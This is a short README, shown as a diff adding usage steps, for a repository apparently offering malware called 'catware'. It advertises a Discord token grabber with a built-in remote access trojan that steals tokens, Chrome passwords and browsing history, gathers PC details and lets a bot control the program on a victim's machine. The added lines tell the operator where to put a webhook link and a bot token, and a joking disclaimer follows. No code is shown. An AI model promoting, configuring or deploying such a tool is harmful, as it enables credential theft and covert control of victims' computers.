KimTaeMin9966/catware/README.md

 This is a pretty powerful discord token grabber with a built in rat that not only grabs all of your tokens but also grabs your chrome passwords, history and gets information about your pc.
 There is also a built in bot system to control the grabber on the victims pc

+# How to use
+add your webhook link on line 34 add your discord bot token on line 792

 You can support this project by just starring the repository!
 Also, please don't use this for malicious purposes ;)